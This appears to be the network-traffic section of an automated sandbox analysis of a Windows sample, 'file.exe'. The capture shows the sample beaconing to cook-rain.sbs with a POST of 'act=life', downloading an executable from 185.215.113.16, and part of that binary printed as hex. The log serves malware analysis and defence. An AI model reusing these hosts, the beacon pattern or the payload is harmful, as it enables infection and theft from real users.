                                                                                                                                                                                                                      Nov 20, 2024 17:42:14.973418951 CET192.168.2.71.1.1.10xb4f4Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:14.973629951 CET192.168.2.71.1.1.10xc796Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.672645092 CET1.1.1.1192.168.2.70x12b4No error (0)cook-rain.sbs104.21.66.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.672645092 CET1.1.1.1192.168.2.70x12b4No error (0)cook-rain.sbs172.67.155.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:41:59.166316986 CET1.1.1.1192.168.2.70xb622No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:41:59.167072058 CET1.1.1.1192.168.2.70x3339No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.168426991 CET1.1.1.1192.168.2.70x61c6No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.292082071 CET1.1.1.1192.168.2.70xd2d5No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.292082071 CET1.1.1.1192.168.2.70xd2d5No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.292082071 CET1.1.1.1192.168.2.70xd2d5No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.299545050 CET1.1.1.1192.168.2.70x92beNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.299545050 CET1.1.1.1192.168.2.70x92beNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.299545050 CET1.1.1.1192.168.2.70x92beNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.299545050 CET1.1.1.1192.168.2.70x92beNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.324373007 CET1.1.1.1192.168.2.70x30eaNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:02.324373007 CET1.1.1.1192.168.2.70x30eaNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.004992962 CET1.1.1.1192.168.2.70xac51No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.004992962 CET1.1.1.1192.168.2.70xac51No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.004992962 CET1.1.1.1192.168.2.70xac51No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.006369114 CET1.1.1.1192.168.2.70xed87No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.471944094 CET1.1.1.1192.168.2.70x2b6No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.471944094 CET1.1.1.1192.168.2.70x2b6No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.471944094 CET1.1.1.1192.168.2.70x2b6No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.471944094 CET1.1.1.1192.168.2.70x2b6No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.472062111 CET1.1.1.1192.168.2.70xc028No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.472062111 CET1.1.1.1192.168.2.70xc028No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:15.216073990 CET1.1.1.1192.168.2.70xb4f4No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:15.218059063 CET1.1.1.1192.168.2.70xc796No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:21.135551929 CET1.1.1.1192.168.2.70xf015No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:21.465626955 CET1.1.1.1192.168.2.70x338cNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.476166964 CET1.1.1.1192.168.2.70x22e7No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.520050049 CET1.1.1.1192.168.2.70x2e8fNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      • cook-rain.sbs
                                                                                                                                                                                                                      • otelrules.azureedge.net
                                                                                                                                                                                                                      • slscr.update.microsoft.com
                                                                                                                                                                                                                      • fs.microsoft.com
                                                                                                                                                                                                                      • https:
                                                                                                                                                                                                                        • js.monitor.azure.com
                                                                                                                                                                                                                        • wcpstatic.microsoft.com
                                                                                                                                                                                                                      • 185.215.113.16
                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      0192.168.2.749758185.215.113.16807476C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Nov 20, 2024 17:41:42.766503096 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Host: 185.215.113.16
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283179998 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:44 GMT
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      Content-Length: 2840064
                                                                                                                                                                                                                      Last-Modified: Wed, 20 Nov 2024 16:31:06 GMT
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      ETag: "673e0eca-2b5600"
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2c 00 00 04 00 00 07 45 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                      Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,E,`Ui` @ @.rsrc`2@.idata 8@dicpbgce+*:@nxasvswz +0+@.taggant@+"4+@
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283260107 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283283949 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283302069 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283334970 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283350945 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283368111 CET776INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283391953 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283407927 CET1236INData Raw: 69 28 73 1c 9d c8 4c 4f cb 5f ae e5 98 b8 56 a0 96 4a fd 94 6f 38 b6 bc a9 b4 4a 8e d9 72 4e 68 84 42 81 f4 54 86 c7 ae a7 d4 49 62 55 43 53 e4 20 0a 53 71 1e c0 26 d7 f3 aa 68 dc 36 00 6d 36 28 41 d3 9a b2 07 95 76 98 03 4b 40 ec 37 ce 13 e0 50
                                                                                                                                                                                                                      Data Ascii: i(sLO_VJo8JrNhBTIbUCS Sq&h6m6(AvK@7P/D#_NmIrSVSN4IpzJR<rIKbJ[E2My8AJR6mHq,DaDp\.nB6}~r!nm]f<,FUP$T/}n&KX#F?@F\.Y#G(yD`|m
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.283426046 CET1236INData Raw: 9a 72 96 a1 a2 f1 8d c6 33 5b a3 f6 16 1f 6d 08 e0 6c 46 1f 35 0e 1a 06 77 df 8e 20 0a ec ce 13 4a 49 86 6f 2d 77 47 33 c9 51 be 29 5e 6e bf 9f 7d 94 b9 4f 95 1f 94 6e 73 a2 bf 23 4c d5 63 e8 4f 3f 73 2e 4d 1b 1e ac 50 13 9e 2f 6b 19 9f 7a 69 12
                                                                                                                                                                                                                      Data Ascii: r3[mlF5w JIo-wG3Q)^n}Ons#LcO?s.MP/kziR6CV$*F2Uq,L.G 6+4zuyF|>6i$G"|{EC/CP*|bT}9qMJ{L6N4&6&<=,J{#q*k'nqTh*qJ
                                                                                                                                                                                                                      Nov 20, 2024 17:41:44.406457901 CET1236INData Raw: 79 4a 70 4f 30 a7 73 f5 29 76 16 c1 38 1e f1 5c 71 29 4d 49 12 49 64 cb 08 4a 03 19 40 e9 12 32 5e cc 4c 24 42 5c fd 99 d9 1f 74 96 c7 73 ae f6 91 62 1e 2d 01 b4 51 8d 6c 6c 0d 41 4a 17 c0 b8 c6 64 bd cc 08 20 ba 69 bc c7 b1 79 91 d4 6d 90 33 be
                                                                                                                                                                                                                      Data Ascii: yJpO0s)v8\q)MIIdJ@2^L$B\tsb-QllAJd iym3@~Fk+<hNmJY=GD2>gJ,l#DG9>Boe<]M_3|`rFVr<q,b"F&(XO~tXZ,!#VMkgRW^:*YKQ%W*NW}@Sb


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      0192.168.2.749704104.21.66.384437476C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:22 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                                                                      2024-11-20 16:41:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                      2024-11-20 16:41:22 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:22 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=jle46q6ec33vk5o8gj0go036dq; expires=Sun, 16-Mar-2025 10:28:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nk82fX8YCAHXCuaAN0NgtnnqlgQUN5p4cSXjCQFoX4v8aShSRAJhxN4AxMLmZMVJY5B7V4OY8v6%2B6EPZVc%2B7B%2F22NktUrc56Khuua9Gk4BuG5PrFtFcU%2BROp0ene4IuI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8e59e31a3b3e7c8e-EWR
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1981&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1432777&cwnd=246&unsent_bytes=0&cid=5724385e63c419cc&ts=717&x=0"
                                                                                                                                                                                                                      2024-11-20 16:41:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                      2024-11-20 16:41:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      1192.168.2.74970513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:22 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:23 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:23 GMT
                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                      Content-Length: 218853
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public
                                                                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 13:10:03 GMT
                                                                                                                                                                                                                      ETag: "0x8DD089B7B2F27B3"
                                                                                                                                                                                                                      x-ms-request-id: 082f1a68-301e-005d-348c-3ae448000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164123Z-185f5d8b95cx9g8lhC1NYCtgvc00000002x0000000007k6r
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:23 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                      2024-11-20 16:41:23 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                      Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                      2024-11-20 16:41:23 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                      Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                      2024-11-20 16:41:23 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                      Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                      2024-11-20 16:41:23 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                      Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                      2024-11-20 16:41:23 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
